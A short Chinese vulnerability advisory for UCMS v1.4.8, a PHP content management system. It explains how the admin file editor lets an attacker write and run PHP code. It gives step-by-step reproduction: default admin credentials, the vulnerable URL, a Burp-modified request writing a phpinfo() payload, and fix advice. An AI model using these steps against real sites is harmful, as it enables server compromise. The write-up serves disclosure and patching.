漏洞描述:
UCMS是一套使用PHP语言编写的内容管理系统。可以非常方便的通过它来快速开发各种企业站、文章站、站群系统。系统兼容PHP5.2--PHP8.0,在APACHE、NGINX、IIS上都能使用,支持MySQL SQLite两种数据库。后台简洁高效,上手容易,结构清晰,管理维护方便。
UCMS v1.4.8版本存在安全漏洞,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问服务器。
复现过程:
1.访问http://ip:port/ucms/login.php,进入登陆页面
2.使用账号密码进行登录,进入主页面
账号:admin
密码:123456
3.访问漏洞页面
http://ip:port/ucms/index.php?do=sadmin_fileedit&dir=/&file=1.php
4.点击新建,并通过burp进行抓包
5.修改post请求中的co参数,并在重发器中发送数据包
co=%3C%3Fphp+phpinfo%28%29%3F%3E&pos=17
6.访问http://ip:port,查看页面phpinfo信息
通过phpinfo可以获取到PHP 的编译选项及扩充配置、PHP 版本、服务器信息及环境变量、PHP 环境变量、操作系统版本信息、路径及环境变量配置、HTTP 标头、及版权宣告等信息,更加方便攻击者对网站进行渗透。
修复建议:
- 升级到最新版本。
- 后台关闭文件管理功能。